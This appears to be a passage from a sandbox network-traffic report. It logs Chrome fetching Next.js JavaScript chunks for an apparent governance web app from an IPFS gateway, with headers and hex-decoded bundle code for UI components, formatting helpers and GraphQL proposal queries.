                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreidqhky3jsus7dxwolk2ik34d74aqlpigkkkec5zbgecrvxcxdukie"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/4609-45f4815a9c085248.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreidqhky3jsus7dxwolk2ik34d74aqlpigkkkec5zbgecrvxcxdukie
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-03
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13026989
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 37 64 61 64 32 30 34 32 30 37 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e47dad204207-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1305INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 36 30 39 5d 2c 7b 38 39 37 32 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 7d 7d 29 3b 76 61 72 20 72 3d 6e 28 38 37 34 36 32 29 2c 6f 3d 6e 28 36 33 33 36 36 29 2c 69 3d 6e 28 36 37 32 39 34 29 2c 73 3d 6e 28 38 36 30 31 30 29 2c 61 3d 6e 28 39 34 37 38 30 29 2c 63 3d 6e 28 38 31 37 31 39 29 2c 6c 3d 6e 28 37 38 38 38 34 29 2c 75 3d 6e 28 33 36 36 32 32 29 2c 66 3d 6e 28 33 34 38 36 37 29 3b 66 75 6e 63 74 69 6f 6e 20 70 28 65 29 7b 72 65 74 75 72 6e 28
                                                                                                                                                                                                                                                  Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4609],{89722:function(e,t,n){"use strict";n.d(t,{Z:function(){return b}});var r=n(87462),o=n(63366),i=n(67294),s=n(86010),a=n(94780),c=n(81719),l=n(78884),u=n(36622),f=n(34867);function p(e){return(
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 61 62 6c 65 64 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 64 69 73 61 62 6c 65 64 2c 69 6e 68 65 72 69 74 3a 76 6f 69 64 20 30 7d 5b 74 2e 63 6f 6c 6f 72 5d 7d 29 29 29 2c 68 3d 69 2e 66 6f 72 77 61 72 64 52 65 66 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 63 6f 6e 73 74 20 6e 3d 28 30 2c 6c 2e 5a 29 28 7b 70 72 6f 70 73 3a 65 2c 6e 61 6d 65 3a 22 4d 75 69 49 63 6f 6e 22 7d 29 2c 7b 62 61 73 65 43 6c 61 73 73 4e 61 6d 65 3a 69 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 73 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 63 2c 63 6f 6c 6f 72 3a 66 3d 22 69 6e 68 65 72 69 74 22 2c 63 6f 6d 70 6f 6e 65 6e 74 3a 68 3d 22 73 70 61 6e 22 2c 66 6f 6e 74 53 69 7a 65 3a 62 3d 22 6d 65 64 69 75 6d 22 7d 3d 6e 2c 79 3d 28 30 2c 6f
                                                                                                                                                                                                                                                  Data Ascii: abled:(e.vars||e).palette.action.disabled,inherit:void 0}[t.color]}))),h=i.forwardRef((function(e,t){const n=(0,l.Z)({props:e,name:"MuiIcon"}),{baseClassName:i="material-icons",className:c,color:f="inherit",component:h="span",fontSize:b="medium"}=n,y=(0,o
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 28 28 28 74 2c 6e 29 3d 3e 28 28 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 65 2e 73 70 61 63 69 6e 67 26 26 6e 75 6c 6c 21 3d 65 2e 73 70 61 63 69 6e 67 5b 6e 5d 7c 7c 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 65 2e 64 69 72 65 63 74 69 6f 6e 26 26 6e 75 6c 6c 21 3d 65 2e 64 69 72 65 63 74 69 6f 6e 5b 6e 5d 29 26 26 28 74 5b 6e 5d 3d 21 30 29 2c 74 29 29 2c 7b 7d 29 2c 69 3d 28 30 2c 73 2e 50 24 29 28 7b 76 61 6c 75 65 73 3a 65 2e 64 69 72 65 63 74 69 6f 6e 2c 62 61 73 65 3a 6f 7d 29 2c 63 3d 28 30 2c 73 2e 50 24 29 28 7b 76 61 6c 75 65 73 3a 65 2e 73 70 61 63 69 6e 67 2c 62 61 73 65 3a 6f 7d 29 3b 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 69 26 26 4f 62 6a 65 63 74 2e 6b 65 79 73 28 69 29 2e 66 6f 72 45 61 63 68 28 28
                                                                                                                                                                                                                                                  Data Ascii: (((t,n)=>(("object"===typeof e.spacing&&null!=e.spacing[n]||"object"===typeof e.direction&&null!=e.direction[n])&&(t[n]=!0),t)),{}),i=(0,s.P$)({values:e.direction,base:o}),c=(0,s.P$)({values:e.spacing,base:o});"object"===typeof i&&Object.keys(i).forEach((
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 72 20 72 3d 6e 28 36 32 37 30 35 29 2c 6f 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2c 69 3d 6f 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 73 3d 6f 2e 74 6f 53 74 72 69 6e 67 2c 61 3d 72 3f 72 2e 74 6f 53 74 72 69 6e 67 54 61 67 3a 76 6f 69 64 20 30 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 61 6c 6c 28 65 2c 61 29 2c 6e 3d 65 5b 61 5d 3b 74 72 79 7b 65 5b 61 5d 3d 76 6f 69 64 20 30 3b 76 61 72 20 72 3d 21 30 7d 63 61 74 63 68 28 63 29 7b 7d 76 61 72 20 6f 3d 73 2e 63 61 6c 6c 28 65 29 3b 72 65 74 75 72 6e 20 72 26 26 28 74 3f 65 5b 61 5d 3d 6e 3a 64 65 6c 65 74 65 20 65 5b 61 5d 29 2c 6f 7d 7d 2c 32 33 33 33 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 70
                                                                                                                                                                                                                                                  Data Ascii: r r=n(62705),o=Object.prototype,i=o.hasOwnProperty,s=o.toString,a=r?r.toStringTag:void 0;e.exports=function(e){var t=i.call(e,a),n=e[a];try{e[a]=void 0;var r=!0}catch(c){}var o=s.call(e);return r&&(t?e[a]=n:delete e[a]),o}},2333:function(e){var t=Object.p
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 7c 30 2c 74 29 3a 75 2c 62 3d 22 74 72 61 69 6c 69 6e 67 22 69 6e 20 6e 3f 21 21 6e 2e 74 72 61 69 6c 69 6e 67 3a 62 29 2c 5a 2e 63 61 6e 63 65 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 6f 69 64 20 30 21 3d 3d 70 26 26 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 70 29 2c 76 3d 30 2c 63 3d 64 3d 6c 3d 70 3d 76 6f 69 64 20 30 7d 2c 5a 2e 66 6c 75 73 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 70 3f 66 3a 53 28 6f 28 29 29 7d 2c 5a 7d 7d 2c 31 33 32 31 38 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 79 70 65 6f 66 20 65 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 65 26 26 28 22 6f 62 6a 65 63 74 22 3d 3d 74 7c 7c 22 66 75 6e 63 74 69 6f 6e 22
                                                                                                                                                                                                                                                  Data Ascii: |0,t):u,b="trailing"in n?!!n.trailing:b),Z.cancel=function(){void 0!==p&&clearTimeout(p),v=0,c=d=l=p=void 0},Z.flush=function(){return void 0===p?f:S(o())},Z}},13218:function(e){e.exports=function(e){var t=typeof e;return null!=e&&("object"==t||"function"
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 72 3d 6e 28 36 37 32 39 34 29 3b 63 6f 6e 73 74 20 6f 3d 72 2e 66 6f 72 77 61 72 64 52 65 66 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 76 67 22 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 30 20 32 30 22 2c 66 69 6c 6c 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 22 74 72 75 65 22 2c 72 65 66 3a 74 7d 2c 65 29 2c 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 2c 64 3a 22 4d 38 20 34 61 34 20 34 20 30 20 31
                                                                                                                                                                                                                                                  Data Ascii: r=n(67294);const o=r.forwardRef((function(e,t){return r.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 20 20",fill:"currentColor","aria-hidden":"true",ref:t},e),r.createElement("path",{fillRule:"evenodd",d:"M8 4a4 4 0 1
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1259INData Raw: 6e 74 4f 62 73 65 72 76 65 72 3d 6e 75 6c 6c 2c 74 68 69 73 2e 77 72 61 70 70 65 72 3d 72 2e 63 72 65 61 74 65 52 65 66 28 29 2c 74 68 69 73 2e 73 74 61 74 65 3d 7b 76 69 73 69 62 6c 65 3a 21 31 7d 7d 63 6f 6d 70 6f 6e 65 6e 74 44 69 64 4d 6f 75 6e 74 28 29 7b 76 61 72 20 65 3b 74 68 69 73 2e 67 65 74 45 76 65 6e 74 4e 6f 64 65 28 29 3b 63 6f 6e 73 74 7b 6f 66 66 73 65 74 3a 74 2c 74 68 72 65 73 68 6f 6c 64 3a 6e 7d 3d 74 68 69 73 2e 70 72 6f 70 73 2c 72 3d 7b 72 6f 6f 74 4d 61 72 67 69 6e 3a 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 74 3f 60 24 7b 74 7d 70 78 60 3a 74 7c 7c 22 30 70 78 22 2c 74 68 72 65 73 68 6f 6c 64 3a 6e 7c 7c 30 7d 3b 74 68 69 73 2e 65 6c 65 6d 65 6e 74 4f 62 73 65 72 76 65 72 3d 6e 65 77 20 49 6e 74 65 72 73 65 63 74 69 6f
                                                                                                                                                                                                                                                  Data Ascii: ntObserver=null,this.wrapper=r.createRef(),this.state={visible:!1}}componentDidMount(){var e;this.getEventNode();const{offset:t,threshold:n}=this.props,r={rootMargin:"number"==typeof t?`${t}px`:t||"0px",threshold:n||0};this.elementObserver=new Intersectio


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  127192.168.2.549850209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:58 UTC504OUTGET /_next/static/chunks/5559-6c8d46c115744018.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1361INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:58 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 18695
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreihorqlbyuxkcc7if25oexkvvtm7o2dzrbtpmwn6ukqx66lr7rh3ay"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/5559-6c8d46c115744018.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreihorqlbyuxkcc7if25oexkvvtm7o2dzrbtpmwn6ukqx66lr7rh3ay
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-07
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 11504826
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 37 64 61 65 36 35 37 63 38 61 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e47dae657c8a-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1303INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 35 35 39 5d 2c 7b 31 35 34 34 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 64 28 6e 2c 7b 4f 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 7d 29 3b 76 61 72 20 72 3d 74 28 33 30 31 32 30 29 2c 6f 3d 74 28 36 34 32 38 38 29 2c 61 3d 74 28 38 35 38 39 33 29 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 63 68 69 6c 64 72 65 6e 3b 72 65 74 75 72 6e 28 30 2c 61 2e 6a 73 78 29 28 72 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 3a 22 63
                                                                                                                                                                                                                                                  Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5559],{15446:function(e,n,t){"use strict";t.d(n,{O:function(){return i}});var r=t(30120),o=t(64288),a=t(85893),i=function(e){var n=e.children;return(0,a.jsx)(r.Z,{sx:{display:"flex",flexDirection:"c
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 6e 26 26 28 72 3d 72 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 6e 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 74 2e 70 75 73 68 2e 61 70 70 6c 79 28 74 2c 72 29 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 31 3b 6e 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 74 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3f
                                                                                                                                                                                                                                                  Data Ascii: ject.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);n&&(r=r.filter((function(n){return Object.getOwnPropertyDescriptor(e,n).enumerable}))),t.push.apply(t,r)}return t}function p(e){for(var n=1;n<arguments.length;n++){var t=null!=arguments[n]?
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 75 6d 62 65 72 28 6e 29 2c 78 3d 6e 75 6c 6c 21 3d 3d 72 26 26 76 6f 69 64 20 30 21 3d 3d 72 3f 72 3a 30 3b 30 3d 3d 3d 6d 3f 78 3d 30 3a 76 6f 69 64 20 30 3d 3d 3d 72 26 26 28 78 3d 6d 3e 31 7c 7c 75 7c 7c 22 55 53 44 22 3d 3d 3d 74 3f 32 3a 37 29 3b 76 61 72 20 79 3d 4d 61 74 68 2e 70 6f 77 28 31 30 2c 2d 78 29 2c 67 3d 30 21 3d 3d 6d 26 26 4d 61 74 68 2e 61 62 73 28 6d 29 3c 4d 61 74 68 2e 61 62 73 28 79 29 2c 4f 3d 67 3f 79 3a 6d 2c 6a 3d 21 31 21 3d 3d 61 26 26 28 61 7c 7c 6d 3e 39 39 39 39 39 29 3b 72 65 74 75 72 6e 20 68 26 26 21 6a 26 26 28 4f 3d 4d 61 74 68 2e 74 72 75 6e 63 28 4e 75 6d 62 65 72 28 4f 29 2a 4d 61 74 68 2e 70 6f 77 28 31 30 2c 78 29 29 2f 4d 61 74 68 2e 70 6f 77 28 31 30 2c 78 29 29 2c 28 30 2c 63 2e 6a 73 78 73 29 28 69 2e 5a 2c
                                                                                                                                                                                                                                                  Data Ascii: umber(n),x=null!==r&&void 0!==r?r:0;0===m?x=0:void 0===r&&(x=m>1||u||"USD"===t?2:7);var y=Math.pow(10,-x),g=0!==m&&Math.abs(m)<Math.abs(y),O=g?y:m,j=!1!==a&&(a||m>99999);return h&&!j&&(O=Math.trunc(Number(O)*Math.pow(10,x))/Math.pow(10,x)),(0,c.jsxs)(i.Z,
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 79 6d 62 6f 6c 73 29 7b 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 6e 26 26 28 72 3d 72 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 6e 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 74 2e 70 75 73 68 2e 61 70 70 6c 79 28 74 2c 72 29 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 31 3b 6e 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 74 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3a 7b 7d 3b 6e 25 32 3f
                                                                                                                                                                                                                                                  Data Ascii: ymbols){var r=Object.getOwnPropertySymbols(e);n&&(r=r.filter((function(n){return Object.getOwnPropertyDescriptor(e,n).enumerable}))),t.push.apply(t,r)}return t}function p(e){for(var n=1;n<arguments.length;n++){var t=null!=arguments[n]?arguments[n]:{};n%2?
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 6e 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 74 2e 70 75 73 68 2e 61 70 70 6c 79 28 74 2c 72 29 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 6a 28 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 31 3b 6e 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 74 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3a 7b 7d 3b 6e 25 32 3f 4f 28 4f 62 6a 65 63 74 28 74 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 28 30 2c 69 2e 5a 29 28 65 2c 6e 2c 74 5b 6e 5d 29 7d 29 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62
                                                                                                                                                                                                                                                  Data Ascii: nPropertyDescriptor(e,n).enumerable}))),t.push.apply(t,r)}return t}function j(e){for(var n=1;n<arguments.length;n++){var t=null!=arguments[n]?arguments[n]:{};n%2?O(Object(t),!0).forEach((function(n){(0,i.Z)(e,n,t[n])})):Object.getOwnPropertyDescriptors?Ob
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 6f 72 56 6f 74 65 73 5c 6e 20 20 20 20 61 67 61 69 6e 73 74 56 6f 74 65 73 5c 6e 20 20 7d 5c 6e 20 20 63 6f 6e 73 74 61 6e 74 73 20 7b 5c 6e 20 20 20 20 69 64 5c 6e 20 20 20 20 70 72 65 63 69 73 69 6f 6e 44 69 76 69 64 65 72 5c 6e 20 20 20 20 63 6f 6f 6c 64 6f 77 6e 50 65 72 69 6f 64 5c 6e 20 20 20 20 65 78 70 69 72 61 74 69 6f 6e 54 69 6d 65 5c 6e 20 20 20 20 63 61 6e 63 65 6c 6c 61 74 69 6f 6e 46 65 65 5c 6e 20 20 7d 5c 6e 22 2c 50 3d 28 30 2c 68 2e 50 73 29 28 72 7c 7c 28 72 3d 28 30 2c 75 2e 5a 29 28 5b 22 5c 6e 20 20 71 75 65 72 79 20 67 65 74 50 72 6f 70 6f 73 61 6c 73 42 79 49 64 28 24 69 64 73 3a 20 5b 53 74 72 69 6e 67 21 5d 21 29 20 7b 5c 6e 20 20 20 20 70 72 6f 70 6f 73 61 6c 73 28 77 68 65 72 65 3a 20 7b 20 69 64 5f 69 6e 3a 20 24 69 64 73 20
                                                                                                                                                                                                                                                  Data Ascii: orVotes\n againstVotes\n }\n constants {\n id\n precisionDivider\n cooldownPeriod\n expirationTime\n cancellationFee\n }\n",P=(0,h.Ps)(r||(r=(0,u.Z)(["\n query getProposalsById($ids: [String!]!) {\n proposals(where: { id_in: $ids
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 6e 61 6e 63 65 43 6f 72 65 53 75 62 67 72 61 70 68 55 72 6c 2c 50 2c 7b 69 64 73 3a 65 7d 29 7d 2c 53 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 49 28 65 29 7b 72 65 74 75 72 6e 20 4d 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 4d 28 29 7b 72 65 74 75 72 6e 28 4d 3d 28 30 2c 73 2e 5a 29 28 6c 28 29 2e 6d 61 72 6b 28 28 66 75 6e 63 74 69 6f 6e 20 65 28 6e 29 7b 76 61 72 20 74 3b 72 65 74 75 72 6e 20 6c 28 29 2e 77 72 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 3b 3b 29 73 77 69 74 63 68 28 65 2e 70 72 65 76 3d 65 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 65 2e 6e 65 78 74 3d 32 2c 46 28 6e 29 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 20 74 3d 65 2e 73 65 6e 74 2c 65 2e 61
                                                                                                                                                                                                                                                  Data Ascii: nanceCoreSubgraphUrl,P,{ids:e})},S=10;function I(e){return M.apply(this,arguments)}function M(){return(M=(0,s.Z)(l().mark((function e(n){var t;return l().wrap((function(e){for(;;)switch(e.prev=e.next){case 0:return e.next=2,F(n);case 2:return t=e.sent,e.a
